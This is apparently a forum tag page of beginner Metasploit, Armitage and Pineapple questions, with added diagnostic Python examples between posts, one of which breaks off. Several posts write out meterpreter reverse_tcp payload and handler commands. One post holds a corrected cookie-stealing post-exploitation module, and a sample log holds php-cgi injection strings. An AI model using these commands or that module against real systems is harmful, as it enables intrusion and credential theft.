Showing results for tags 'metasploit'.

  1. Hello guys, I wanted to use the Adobe PDF Embedded EXE NOJS exploit (use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs) on my Ubuntu server where I installed Metasploit. After setting up the exploit:

     msf exploit(adobe_pdf_embedded_exe_nojs) > set payload windows/meterpreter/reverse_tcp
     msf exploit(adobe_pdf_embedded_exe_nojs) > set lhost 85.214.XX.XX
     msf exploit(adobe_pdf_embedded_exe_nojs) > set filename file.pdf
     msf exploit(adobe_pdf_embedded_exe_nojs) > exploit

     I used my server's IP address for LHOST, in order to make it a real-world pentest. After that, I set up the multi handler to get the reverse connection:

     use exploit/multi/handler
     set payload windows/meterpreter/reverse_tcp
     set lhost 85.214.XX.XX
     exploit

     I sent the PDF file to my virtual machine (Windows 7). I ran the PDF file, but I didn't get the reverse connection; I didn't receive a connection in Metasploit. What am I doing wrong? A log of my server: Linux 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux. Thank you guys.
  2. Hi guys, I recently started learning more about ethical hacking and stumbled upon Metasploit. It is a great tool, but I am having an issue on a pen test, which is the following. I am trying to exploit my iPad Air (iOS 8.1.1, jailbroken) and I am using the exploit "exploit/apple_ios/ssh/cydia_default_ssh". The OS I am running is Kali Linux. I am able to set up RHOST with my IP address ( and the default port 22. This data is confirmed and accurate, as I did an nmap scan just before that showed me that port 22 was open on that IP. Everything seems fine until I try to run the exploit; what happens is this:

     [*] - Attempt to login as 'root' with password 'alpine'
     [-] SSH Error: Net::SSH::Exception : could not settle on kex algorithm
     [*] - Attempt to login as 'mobile' with password 'dottie'
     [-] SSH Error: Net::SSH::Exception : could not settle on kex algorithm

     I have left the root:alpine login as the default on my iPad. I had even changed the password in my iPad's terminal and tried to log in via Armitage with SSH Login and the updated credentials. Still, I am always getting the same error and am not sure what is going on. Can anyone help here? Cheers
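The error in the post above is raised by the SSH transport layer before any password is tried: each side sends an SSH_MSG_KEXINIT listing the key-exchange algorithms it supports, and if the two lists share nothing the connection is dropped. The script below is an added example, not code from the post, from Metasploit or from Net::SSH. It builds two constructed KEXINIT messages, parses them as RFC 4253 section 7.1 lays them out, and reports which name-lists have no common entry. The algorithm lists for the "legacy server" and "modern client" are illustrative assumptions, not what the iPad's sshd or the Metasploit client actually advertise.

```python
"""SSH_MSG_KEXINIT parsing and kex negotiation (RFC 4253 section 7.1).

Added example; not code from the forum post. The two KEXINIT messages are
constructed here, and the algorithm lists are illustrative assumptions about
a legacy sshd and a modern client, not what any real iOS build advertises.
"""
import struct

SSH_MSG_KEXINIT = 20

# The ten name-lists that follow the 16-byte cookie, in wire order.
KEXINIT_FIELDS = (
    "kex_algorithms", "server_host_key_algorithms",
    "encryption_algorithms_c2s", "encryption_algorithms_s2c",
    "mac_algorithms_c2s", "mac_algorithms_s2c",
    "compression_algorithms_c2s", "compression_algorithms_s2c",
    "languages_c2s", "languages_s2c",
)


def _name_list(names):
    """Encode an SSH name-list: uint32 length + comma-separated ASCII names."""
    data = ",".join(names).encode("ascii")
    return struct.pack(">I", len(data)) + data


def build_kexinit(fields, cookie=b"\x00" * 16):
    """Serialise a KEXINIT payload from {field name: [algorithm, ...]}."""
    payload = bytes([SSH_MSG_KEXINIT]) + cookie
    for name in KEXINIT_FIELDS:
        payload += _name_list(fields.get(name, []))
    payload += b"\x00"                 # first_kex_packet_follows = FALSE
    payload += struct.pack(">I", 0)    # reserved, always 0
    return payload


def parse_kexinit(payload):
    """Decode a KEXINIT payload into {field name: [algorithm, ...]}."""
    if not payload or payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("not an SSH_MSG_KEXINIT payload")
    pos = 1 + 16  # message id + cookie
    fields = {}
    for name in KEXINIT_FIELDS:
        (length,) = struct.unpack_from(">I", payload, pos)
        pos += 4
        raw = payload[pos:pos + length].decode("ascii")
        pos += length
        fields[name] = raw.split(",") if raw else []
    return fields


def negotiate(client_list, server_list):
    """RFC 4253 7.1: the first client algorithm that the server also lists wins."""
    for alg in client_list:
        if alg in server_list:
            return alg
    return None


def negotiate_all(client_payload, server_payload):
    """Run the negotiation for every name-list; None marks a field with no overlap."""
    client = parse_kexinit(client_payload)
    server = parse_kexinit(server_payload)
    return {name: negotiate(client[name], server[name]) for name in KEXINIT_FIELDS}


def missing_fields(client_fields, server_fields):
    """Names of the lists with no common algorithm; any entry here kills the handshake."""
    result = negotiate_all(build_kexinit(client_fields), build_kexinit(server_fields))
    return [name for name in KEXINIT_FIELDS[:8] if result[name] is None]


# Constructed messages (assumptions): a client that has dropped SHA-1 key exchange
# and a server that only knows the SHA-1 Diffie-Hellman variants.
MODERN_CLIENT = {
    "kex_algorithms": ["curve25519-sha256", "diffie-hellman-group14-sha256"],
    "server_host_key_algorithms": ["ssh-ed25519", "rsa-sha2-256", "ssh-rsa"],
    "encryption_algorithms_c2s": ["aes128-ctr"],
    "encryption_algorithms_s2c": ["aes128-ctr"],
    "mac_algorithms_c2s": ["hmac-sha2-256", "hmac-sha1"],
    "mac_algorithms_s2c": ["hmac-sha2-256", "hmac-sha1"],
    "compression_algorithms_c2s": ["none"],
    "compression_algorithms_s2c": ["none"],
}
LEGACY_SERVER = {
    "kex_algorithms": ["diffie-hellman-group-exchange-sha1", "diffie-hellman-group1-sha1"],
    "server_host_key_algorithms": ["ssh-rsa", "ssh-dss"],
    "encryption_algorithms_c2s": ["aes128-ctr", "aes128-cbc"],
    "encryption_algorithms_s2c": ["aes128-ctr", "aes128-cbc"],
    "mac_algorithms_c2s": ["hmac-sha1"],
    "mac_algorithms_s2c": ["hmac-sha1"],
    "compression_algorithms_c2s": ["none"],
    "compression_algorithms_s2c": ["none"],
}


if __name__ == "__main__":
    print("no overlap in:", missing_fields(MODERN_CLIENT, LEGACY_SERVER))
    # Re-enabling one legacy kex on the client side is enough to get past KEXINIT.
    relaxed = dict(MODERN_CLIENT, kex_algorithms=MODERN_CLIENT["kex_algorithms"]
                   + ["diffie-hellman-group1-sha1"])
    print("no overlap in:", missing_fields(relaxed, LEGACY_SERVER))
```

To diagnose a real target, capture the server's lists (ssh -vvv to the host prints both sides' KEX proposals, and the first exchange is unencrypted in a packet capture) and feed them to negotiate(); whichever side lacks the entry is the one to reconfigure. Re-enabling a SHA-1 group exchange on the client is a lab-only workaround, since those algorithms were removed from defaults for a reason.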
  3. Hey! Tested on the iPhone 4 running iOS 7, jailbroken using evasion7. I wanted to talk about using an iDevice (iOS 7) as a pen testing device. [Noob friendly]

     First off, why should you use an iDevice as a pen testing device?
     - It's portable
     - Not noticeable
     - It looks cool :)
     - It's pretty fast
     - iOS == Unix
     - It can easily be used with the Pineapple ;)

     Let's move on. So how do you make your iDevice into a pentesting device?
     1. First you need to jailbreak your iDevice (e.g. Evasion7).
     2. Open Cydia. Add repositories by going to "Manage", then "Sources", then "Edit", then "Add". Then add all these repositories:
        http://cydia.myrepospace.com/Boo/
        http://ininjas.com/repo/
        http://cydia.xsellize.com/
     3. When that's done, click on "http://ininjas.com/repo/" and scroll down until you see "Metasploit", then click on "Metasploit", then "Edit", then "Install".
     4. When that's done, go back and scroll until you see "Aircrack-ng", then click on it and install it just like before.
     5. When that's done, install: Auto Reconnect, Mobile Terminal, BeEF, CUPP, Dsniff Suite, dsniff-fr0g, Ettercap-ng GTK, Ettercap No GTK, Evil Grade, iAHT, iPwN, John the Ripper, Low Orbit Ion Cannon, NBTScan, Nikto2, Nmap, Pirni, Ruby 1.8.6, Searchsploit, SSLstrip, Wordlists, XSSer, xterm, iWep, SET (not the one that's called Social Engineering Toolkit but the one that's called SET!!), OpenSSH!, iSSH.

     I know that is a lot of tools and it will take you some time, but when it's done you have an awesome pentesting device! When you have installed all those tools, open Mobile Terminal or xterm and type "su" and fill in your password (the standard password is: alpine), then type cd /pentest and there are all your tools. Make sure you go to /pentest/exploits/SET/config, open set_config and change the Metasploit path to the path where Metasploit is installed. If you need help setting up the other tools (they should work fine) or if you have any problems, feel free to leave them below.

     Enjoy your simple but powerful pen testing device ;) Merry Christmas! :) - Jesse
  4. http://i.imgur.com/xQuF9Fq.jpg http://i.imgur.com/RAtlIVl.jpg
     AWUS036NHA v5, Anker 15000 mAh, Raspberry Pi B+, 2 A USB hub. I'm at about $135 so far (money I have made with tips during work hours). I had the Pi plugged into the 1 A port and the USB hub + Alfa card plugged into the 2 A power supply, and it seems to run just fine (it fails the other way around; the Alfa card needs 2 A or a disconnect/reconnect happens). In the video above, I add this to my /etc/rc.local: ./mana/run-mana/start-noupstream.sh with eth0 as the out interface. I have seen this thing go for 12 hours without any dmesg errors (./start-nat-simple.sh). I plan to get another Alfa card for a good out interface. It's ugly at the moment; I plan to clean it up.
  5. Hi, when I try to run this in a command terminal on my VMware Kali box I get some message about using msfvenom. Can someone please turn my code into msfvenom code, or whatever I need to make this work for Android and Armitage? Thanks.

     msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=8080 R > nsf-2.apk
  6. I want to test and demo pwning of mobile devices such as Android and iOS. I googled a lot and found a recent example: https://www.youtube.com/watch?v=TbyQoWyaw2g. Can I achieve the same thing using the Pineapple only? Right now I am trying to get a Kali machine + BeEF + Metasploit working with that module, without success (that specific vulnerability). I found in the forum there's something named JasagerPwn that contains BeEF: https://forums.hak5.org/index.php?showtopic=30588, but I don't know if this is an updated infusion or if it was replaced with another infusion. Bottom line: is there an infusion or setup with the Pineapple that can operate BeEF against browsers of mobile devices and let me run exploits, and to be specific the UXSS demo shown in the video? I will be happy to get your input and redirection on what setup I need to focus on. A more general question: what else do you think I can demo on mobile phones/browsers? A keylogger? I am looking for something with an effect, visual or sound, that is an action where I decide the timing (not redirecting to a page that plays a wav file). Thank you very much! The Pineapple is so cool; I can't wait to understand how deep I can use it.
  7. Hello there, fellow hackers/netizens. I have installed Kali Linux in VirtualBox on Windows and it's running fine. I'd like to learn more about hacking and how I can protect myself from such attacks. So, to start with, I've loaded a PDF with a meterpreter reverse TCP payload in Metasploit, and the target has downloaded it and opened the file. How do I know if meterpreter is running on the target computer? Is there anything I have to do on my end to start the installation? And I can't seem to get the meterpreter> prompt no matter what I do in the terminal. I need beginner's-level help if any of you have the know-how and are willing to guide me. Many thanks in advance.
  8. Hello, does anyone here have a similar issue with Metasploit? Error message:

     [FAIL] Postgresql must be started before Metasploit ... failed!
     root@kali:~# service metasploit status
     [FAIL] Metasploit rpc server is not running ... failed!
     [FAIL] Metasploit web server is not running ... failed!
     [FAIL] Metasploit worker is not running ... failed!
     root@kali:~# service metasploit start
     [FAIL] Postgresql must be started before Metasploit ... failed!
     root@kali:~# msfconsole
     [-] Failed to connect to the database: could not connect to server: Connection refused
     Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 5432?
     could not connect to server: Connection refused
     Is the server running on host "localhost" ( and accepting TCP/IP connections on port 5432?
     [Metasploit ASCII-art banner omitted]
     Trouble managing data? List, sort, group, tag and search your pentest data in Metasploit Pro -- learn more on http://rapid7.com/metasploit
     =[ metasploit v4.10.0-2014092602 [core:4.10.0.pre.2014092602 api:1.0.0]]
     + -- --=[ 1346 exploits - 741 auxiliary - 217 post ]
     + -- --=[ 340 payloads - 35 encoders - 8 nops ]
     + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
     msf > search name:oracle
     [!] Database not connected or cache not built, using slow search
     Matching Modules
     ================
     Name                                      Disclosure Date  Rank    Description
     auxiliary/admin/oracle/ora_ntlm_stealer   2009-04-07       normal  Oracle SMB Relay Code Execution
     auxiliary/admin/oracle/oracle_login       2008-11-20       normal  Oracle Account Discovery
     auxiliary/admin/oracle/oracle_sql         2007-12-07       normal  Oracle SQL Generic Query
     auxiliary/admin/oracle/oraenum                             normal  Oracle Database Enumeration
     ....
     Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
     exploit/windows/oracle/tns_service_name   2002-05-27       good    Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
     msf >
     root@kali:~# uname -r
     3.14-kali1-amd64

     Thank you for any help, it is greatly appreciated.
  9. Hi - thanks in advance to any decent folk for looking at this. If anyone with knowledge can assist, I'd be grateful. I'm on Windows 8.1 and recently discovered I'd been hacked using Metasploit and meterpreter. I won't go into the tedious details of it all, but my whole system is now stuffed. It will need replacement. I am 100% certain the attack originated from a person I live with. He was hooked up to my wifi and was on the network. He occasionally had physical access to my PC. My problem is how to prove it. Can anyone tell me if there is any fairly failproof way of determining if these hacking tools are or were on his Mac? I did a basic check and couldn't seem to find much; however, I am a Mac ignoramus, so unless it was listed in programs I wouldn't have found it anyhow. I can occasionally access his Mac when he is out. I only want to determine if he was the source of the hack. I have no interest in anything else on his system. If anyone can help me in any way at all, please let me know. Cheers and thanks
  10. Hey, this is my first post here, sorry for the question, but I was just wondering if I could get a nudge in the right direction. My target would of course be aware of what I was doing and I would have their full permission, but I was wondering how I would go about connecting to a remote host and not a local one, as I have only ever experimented with local machines. Thanks in advance!
  11. Hi guys, on my blog I wrote a post about a MitM attack using SSLStrip + arpspoof. It's in Italian, so I don't know if you can understand it: http://www.gianlucaghettini.net/intercettazione-traffico-https-e-recupero-dati-sensibili/. Other than the actual attack (which is very well known), I focused on the HSTS policy and how it is useful to prevent such attacks. Do you know of any successful attempt to break such a security policy? Poisoning the DNS cache of the target host could lead to a scenario in which the target browser goes to a fake domain, receives a forged HTTP header with a max-age value of zero:

      Strict-Transport-Security: max-age=0; includeSubDomains

      and then gets redirected to the real site. The HSTS RFC says that browsers SHOULD ignore the HSTS header when in HTTP mode, but maybe this very specific check was not implemented in all browsers.
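The scenario in the post above comes down to one rule in RFC 6797: a user agent only processes a Strict-Transport-Security header that arrived over a secure transport with no certificate errors, so a max-age=0 header served from a poisoned or ARP-spoofed plain-HTTP connection never reaches the HSTS store. The class below is an added example, not code from the blog post and not any browser's implementation; it models the store, the header grammar (section 6.1), the processing rule (section 8.1) and the http-to-https rewrite (section 8.3). Clock values are passed in explicitly so expiry can be tested deterministically.

```python
"""HSTS policy store modelled on RFC 6797 (sections 6.1, 8.1 and 8.3).

Added example; not from the linked blog post. It shows why the max-age=0 trick
does not work against a conforming browser: STS headers are honoured only on a
secure transport with a valid certificate, so a header injected into plain HTTP,
whether by ARP spoofing or DNS poisoning, never changes the store.
"""
import re
import time


class HstsStore:
    """Known HSTS hosts: host -> (expiry as epoch seconds, includeSubDomains flag)."""

    def __init__(self):
        self._hosts = {}

    @staticmethod
    def parse_header(value):
        """Parse an STS header value; return (max_age, include_subdomains) or None.

        Directive names are case-insensitive, max-age is mandatory, a directive
        may appear only once, and unknown directives are ignored (RFC 6797 6.1).
        """
        max_age, include_sub, seen = None, False, set()
        for directive in value.split(";"):
            directive = directive.strip()
            if not directive:
                continue
            name, _, val = directive.partition("=")
            name = name.strip().lower()
            val = val.strip().strip('"')
            if name in seen:
                return None  # duplicated directive: header is invalid
            seen.add(name)
            if name == "max-age":
                if not re.fullmatch(r"\d+", val):
                    return None
                max_age = int(val)
            elif name == "includesubdomains":
                include_sub = True
        if max_age is None:
            return None
        return max_age, include_sub

    def process_response(self, host, header_value, *, secure_transport, cert_ok=True, now=None):
        """Apply an STS header from a response (RFC 6797 8.1). True if the store changed."""
        now = time.time() if now is None else now
        if not secure_transport or not cert_ok:
            return False  # 8.1: STS headers over HTTP or with TLS errors are ignored
        parsed = self.parse_header(header_value)
        if parsed is None:
            return False  # malformed header: nothing happens
        max_age, include_sub = parsed
        host = host.lower()
        if max_age == 0:
            return self._hosts.pop(host, None) is not None  # 8.1: max-age=0 forgets the host
        self._hosts[host] = (now + max_age, include_sub)
        return True

    def is_known(self, host, now=None):
        """True if host, or a superdomain flagged includeSubDomains, has an unexpired entry."""
        now = time.time() if now is None else now
        labels = host.lower().split(".")
        for i in range(len(labels)):
            entry = self._hosts.get(".".join(labels[i:]))
            if entry is None:
                continue
            expiry, include_sub = entry
            if expiry <= now:
                continue  # expired entries count as unknown
            if i == 0 or include_sub:
                return True
        return False

    def rewrite(self, url, now=None):
        """RFC 6797 8.3: upgrade http:// to https:// before the request leaves the browser."""
        m = re.fullmatch(r"http://([^/:?#]+)(?::(\d+))?(.*)", url)
        if not m or not self.is_known(m.group(1), now):
            return url
        host, port, rest = m.groups()
        port_part = "" if port in (None, "80") else ":" + port  # 80 becomes 443 implicitly
        return "https://" + host + port_part + rest


if __name__ == "__main__":
    store = HstsStore()
    store.process_response("example.com", "max-age=31536000; includeSubDomains",
                           secure_transport=True, now=1000)
    print(store.rewrite("http://www.example.com/login", now=2000))
    # The attacker's forged header over plain HTTP changes nothing.
    print(store.process_response("example.com", "max-age=0; includeSubDomains",
                                 secure_transport=False, now=2000))
```

The remaining exposure is the one the RFC itself acknowledges: the very first visit, before any header has been seen, and any visit after the entry has expired. That window is what browser preload lists exist to close, and it is why a lab test of SSLStrip against an HSTS site only succeeds when the browser profile is fresh.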
  12. So I have been having this problem for about a week now and I can't figure out why. The problem is that whenever I try to start up a session of Metasploit or Armitage it gives me an error message saying that it couldn't connect to the database!

      Armitage's error message:
      Could not connect to database. Click Help button for troubleshooting help. Connection refused. Check that the hostname and port are correct and that the postmaster is accepting TCP/IP connections.

      Metasploit's error message:
      Failed to connect to database: Could not connect to server: Connection Refused

      If anyone could give me some suggestions on how to fix it I would be very grateful! If any more information is needed, please tell me!
  13. Hey guys, I have a little problem which I do not know how to solve. The problem is that when I encode my payload with x86/shikata_ga_nai and I try it on my Windows PC, it says it cannot run on the OS. This is what I typed:

      msfpayload windows/meterpreter/reverse_tcp LHOST=HOSTIP LPORT=PORT R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X > /root/Desktop/virus.exe

      Did I do something wrong? I tested it on Win 8, Win 7 and Win XP and it says it cannot open on every system :( Does someone know the solution? Thank you,
  14. Hi, complete beginner with Metasploit, so please be gentle! I noticed that the enum_ie module doesn't work for Windows 8 clients, so I was trying to put a script together to download the cookie files in our test environment. I figured it would be a pretty simple exercise in learning my way around the scripting and exploring post-exploitation automation, as I wanted to include the script as part of the AutoRunScript rc file. When I run the script in a meterpreter session, I get absolutely no output, and I am sure that I am missing something obvious, but googling hasn't thrown up anything that I can see. Here is my script:

      require 'msf/core'
      require 'msf/core/post/file'
      require 'fileutils'

      class Metasploit3 < Msf::Post
        include Msf::Post::File

        def initialize(info = {})
          super(update_info(info,
            'Name'         => 'Find Windows Cookies',
            'Description'  => %q{ This POST module attempts to download Windows 7 or 8 cookies },
            'License'      => MSF_LICENSE,
            'Author'       => [ '-=bb=- ' ],
            'Version'      => '$Revision: 1.0 $',
            'Platform'     => [ 'win' ],
            'SessionTypes' => [ 'meterpreter' ]
          ))
        end

        def run
          base = session.fs.file.expand_path("%USERPROFILE%")
          # Was `location << base + ...` with no `location` defined; assign it instead.
          location = base + "\\AppData\\Local\\Microsoft\\Windows\\InetCookies" # Windows 8
          target = client.sys.config.sysinfo["Computer"]
          file_type = "*.txt*"
          # Was "/tmp" + target, i.e. /tmpHOSTNAME; download needs an existing directory.
          dump = ::File.join("/tmp", target)
          ::FileUtils.mkdir_p(dump)
          print_status("Searching for and downloading cookies...")
          # search(root, glob, recurse, timeout) takes positional arguments.
          getfile = client.fs.file.search(location, file_type, true, -1)
          getfile.each do |file|
            src = "#{file['path']}\\#{file['name']}"
            print_status("Found #{src}...Saving in - #{dump}")
            client.fs.file.download(dump, src) # download(destination, source)
          end
        end
      end

      Could anybody point out what bone-headedness I'm performing wrong? Many thanks in advance
  15. Just noticed that there are no reverse DNS or HTTPS meterpreters for Linux. Why is that? Is it not possible?
  16. Hello everyone, so I got my Pineapple Mark V and I was trying to use dns_spoof with SET on my Kali machine. Here is my scenario: I have the dns_spoof infusion on my MKV running with the line: * (Kali machine's IP address). And on my Kali I have SET running a Java applet attack on If I go to my victim PC (, for example) and I type the IP in my browser I get to the SET page. However, DNS Spoof doesn't seem to be spoofing any website to the IP. If I browse to www.google.com I just get a blank page. Is there any other configuration I'm missing? Thank you, Joe Almeida
  17. Dear Hak5ers, apologies if this has been discussed; I only went a few pages in to see. So what I'm goofing with is the whole isolation proxy thing, using whonix-gateway in a VM (I couldn't build it successfully on my extra physical box). I followed the basic guide provided by them just to get 'er up and running. I'm a VMware man myself, but there is some extra work involved, so I went with the suggested VirtualBox. So the guide suggests the following (actually a mix of two):

      VM #1: the Whonix gateway. It has 2 NICs: one is NAT so we can reach out on the net to Tor; the second is an internal one (called whonix) running on by default.
      VM #2: Kali (not whonix-workstation) with one NIC (the internal one called whonix) running on

      So what's my beef? Well, a lot works in terms of tunneling everything through the Whonix gateway, which is essentially the good ole' "how to route everything through Tor" debate. But the one item I'm trying to tinker with is getting Metasploit to behave, which it doesn't by default. What happens is (bear in mind this is through Armitage), regardless of the IP(s) you enter for testing, they all A) basically say every bloody port is open, and B) just to get things moving, I used a known vulnerable VM to see how exploits got handled in all this routing. Well, not too smooth. Basically they EOF over and over, so you'll see the box pop (turn red with lightning) then just die (End of File). Before I start pulling hair and messing with routing tables, and most importantly mucking with the Whonix gateway, which I shouldn't really touch too much, I wanted to run this scenario by you guys and see if anyone has tried this out, worked/not worked etc. Would love to work this one out with some discussion. Thoughts?
  18. Hey guys, so the question I have is regarding pivots and what I'm assuming is going to come down to the 'route add' command on Kali. Here's the scenario:

      Attack machine = (which is assigned through tap0 from a VPN connection). The VPN connection above automatically attaches me to a 192.168.15.* network.
      Target network 1 = the 192.168.15.* range mentioned above.
      Target network 2 = 10.1.1.*

      One of the machines on target network 1 has been compromised, and I've pivoted through Metasploit to launch new attacks at target network 2, because this compromised machine is attached to target network 2. So that's not a problem. What I'm trying to figure out is how to route everything through this pivot outside of Metasploit. With the MSF pivot, I can only use what's inside Metasploit, and I'd like to be able to recon this new network using general means. I tried a couple of route add commands, but I'm definitely not doing it right. Any help would be much appreciated. Just to sum up simply:

      me = ---> 192.168.15.* (VPN connection on tap0)
      target net 1 = 192.168.15.*
      target net 2 = 10.1.1.*
      need 'me' to pivot through 'target net 1' to reach 'target net 2'
  19. I would like to know if there is a way to generate random EXE templates for injecting custom shellcode into, just like MSF Pro does. Is there a manual way to do this? If not, where can I find the information I will need to write my own? I am not a programmer, so this will need to be VERY good instruction for me to be able to follow. I am willing to learn, but I am very inexperienced here. I basically need to be able to create my own custom/random EXE template, then know how to add the custom shellcode created by msfvenom's output into it so that it runs. Thanks to all who help!
  20. Hello everyone, I've been working on a very small project related to the Android operating system and one of the exploits available in Metasploit, called android_htmlfileprovider. With this simple tool, mixed with just a bit of social engineering, you apparently are able to obtain any file from the victim's Android device (only if you already know the file's absolute path on the device). The thing is, even though I'm able to retrieve regular txt files (containing nothing but plain text), I am not able to gather files with the extension .db, which actually contain sensitive information like the browser's passwords, contacts data, etc. I believe this has something to do with special characters included in these .db files. I mean, when opening them with a regular text editor, a lot of special characters can be seen. I'm not completely sure about this, though. I'm also using a rooted AVD (Nexus One) with an old Android version (2.2), as this exploit will only work with this version (or an older one). I would really appreciate it if someone could help me out on this one. Thank you.
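Two of the posts above are, at bottom, the same question: does the file I hold have the format I think it has? Post 13's msfencode pipeline writes its output to virus.exe, and Windows refuses to run it; post 20's .db files come back through android_htmlfileprovider but cannot be opened. Before debugging the tool, check the bytes. The script below is an added example, not code from either post, from msfencode or from the Metasploit module. It recognises a PE executable by its MZ stub and PE signature, a SQLite 3 database by its 16-byte header, and models what a transport that treats the payload as text does to binary content, which is the usual reason a database survives as a file but not as a database. All samples are constructed: the "shellcode" is a NOP sled, not a real payload, and the PE header is the minimum that satisfies the check, not a loadable executable.

```python
"""Sanity-check a generated or transferred file by its magic bytes.

Added example serving two posts: the msfencode output Windows will not run
and the .db files that arrive unusable from an Android device. It is not code
from either post. All sample byte strings are constructed.
"""
import base64
import struct


def is_pe(data):
    """True if data has a DOS 'MZ' stub whose e_lfanew (offset 0x3C) points at 'PE' + two NULs."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def is_sqlite(data):
    """SQLite 3 files start with the 16-byte string 'SQLite format 3' + NUL."""
    return data[:16] == b"SQLite format 3\x00"


def classify(data):
    """Rough file kind; 'raw-binary' is what a bare shellcode blob or damaged DB looks like."""
    if is_pe(data):
        return "pe"
    if is_sqlite(data):
        return "sqlite"
    if all(0x20 <= b < 0x7F or b in b"\r\n\t" for b in data):
        return "text"
    return "raw-binary"


def through_text_channel(data, encoding="utf-8"):
    """Model a transport that treats the payload as text: bytes that are not valid
    in the encoding get replaced, which silently corrupts any binary file."""
    return data.decode(encoding, errors="replace").encode(encoding)


def through_base64_channel(data):
    """The same transport with the payload base64-wrapped first; binary survives."""
    wrapped = base64.b64encode(data)
    return base64.b64decode(through_text_channel(wrapped))


def minimal_pe():
    """Constructed MZ stub + PE signature + zeroed COFF header (passes is_pe, not runnable)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: PE header right after the stub
    return bytes(dos) + b"PE\x00\x00" + bytes(20)


# Constructed samples.
NOP_SLED_STUB = b"\x90" * 16 + b"\xcc"                      # shellcode-like bytes, no PE wrapper
SQLITE_SAMPLE = b"SQLite format 3\x00" + bytes(range(256))  # header plus arbitrary page bytes


def transfer_report(data):
    """Kind of the file plus whether each channel delivers it byte-for-byte intact."""
    return {
        "kind": classify(data),
        "text_channel_intact": through_text_channel(data) == data,
        "base64_channel_intact": through_base64_channel(data) == data,
    }


if __name__ == "__main__":
    for name, sample in (("pe", minimal_pe()), ("nop sled", NOP_SLED_STUB), ("sqlite", SQLITE_SAMPLE)):
        print(name, transfer_report(sample))
```

The SQLite case shows why a header check alone is not enough: the ASCII header survives the text channel, so the file still looks like a database, while the page bytes behind it do not. Compare a hash or at least the size against the original on the device, and move binary files through a channel that preserves bytes (base64, or a download path that never decodes).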
  21. I'm running Ubuntu 12.04 and have been trying to get Armitage running correctly so I can learn and move on to more advanced methods. I got Metasploit installed just fine, but when I try to execute armitage I get the error "line 1: java: command not found" and nothing happens. What should I do from here to get it to work?
  22. Is this possible? I know that Metasploit has the ability to write custom keyloggers, but I don't know much about it and I've got to update my boss later today. Basically, there's some vendor we pay a ton of money to write and utilize a runtime DLL, which captures events like when a window opens/closes, gains focus or loses focus, etc. Turns out the vendor is an evil, obstructive, insulting, and generally useless company that causes us non-stop problems. I said that it's probably possible to accomplish the same thing with a custom-written keylogger from Metasploit. Hopefully it is possible, and if so, then hopefully we can output the data to SQL Server for statistical analysis and storage. If anyone knows how to do any part of that, please let me know. I don't have to actually do all this today; I just have to say if it's possible and, if so, kind of show how it would work. I'll try to actually accomplish it though. If anyone can help you'll be my hero!!!! UPDATE: Sorry for the garbled message. Stupid iPad.
  23. Hi, my question is how do we set up Metasploit (Armitage) to work with the Pineapple? I've seen some images of Cobalt Strike with the Pineapple, but they don't say how to set it up. Can someone help me please? I have the newest Pineapple Mark IV.
  24. I am trying to exploit CVE-2012-1823 using the Metasploit exploit exploit/multi/http/php_cgi_arg_injection. As soon as I try to exploit, I get an error:

      Exploit failed: NoMethodError undefined method `gsub' for #<URI::Generic:0xc6006a8 URL:/>

      Please help!!!
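Whatever the module error above turns out to be, a tester running php_cgi_arg_injection leaves a very recognisable trace in the target's access log, and the defender's side of CVE-2012-1823 is worth seeing next to it. The script below is an added example, not code from the post or from the Metasploit module. It reads Apache combined-format log lines and flags requests whose query string would have been handed to php-cgi as command-line options: the bug was that a query string containing no '=' is split into arguments per the CGI specification, and unpatched php-cgi accepted its own options (-s, -d and so on) from there. The log lines are constructed here, with IPs from documentation ranges.

```python
"""Spot CVE-2012-1823 (php-cgi argument injection) attempts in web access logs.

Added example; not code from the post or from the Metasploit module. php-cgi
before the fix turned a query string that contains no '=' into command-line
options, so requests such as /index.php?-s or
/index.php?-d+allow_url_include%3d1 reached the interpreter as argv.
The log lines below are constructed in Apache combined format.
"""
import re
from urllib.parse import unquote

# Apache combined log up to the status code; the remainder of the line is not needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
PHP_CGI_OPTION = re.compile(r"^-[A-Za-z]")


def php_cgi_argv(raw_query):
    """Return the argv php-cgi would have received from this query string, or [].

    The CGI spec only splits a query into arguments when it holds no literal '=',
    which is why real attacks encode '=' as %3d; decoding happens after that check.
    """
    if "=" in raw_query:
        return []
    argv = [unquote(token) for token in raw_query.split("+") if token]
    if argv and PHP_CGI_OPTION.match(argv[0]):
        return argv
    return []


def scan_log(lines):
    """Return one finding per request whose query string parses as php-cgi options."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        argv = php_cgi_argv(query)
        if argv:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": path,
                "argv": argv,
                "status": int(m.group("status")),
            })
    return findings


# Constructed sample: two attack requests, one %2d-encoded variant, two benign look-alikes.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2014:13:55:36 +0000] "POST /index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2014:13:55:40 +0000] "GET /index.php?-s HTTP/1.1" 200 2048
203.0.113.9 - - [10/Oct/2014:13:57:12 +0000] "GET /cgi-bin/php?%2ds HTTP/1.1" 200 2048
198.51.100.2 - - [10/Oct/2014:13:56:01 +0000] "GET /index.php?page=-s HTTP/1.1" 200 1024
198.51.100.2 - - [10/Oct/2014:13:56:05 +0000] "GET /search.php?q=hello+world HTTP/1.1" 200 300
"""


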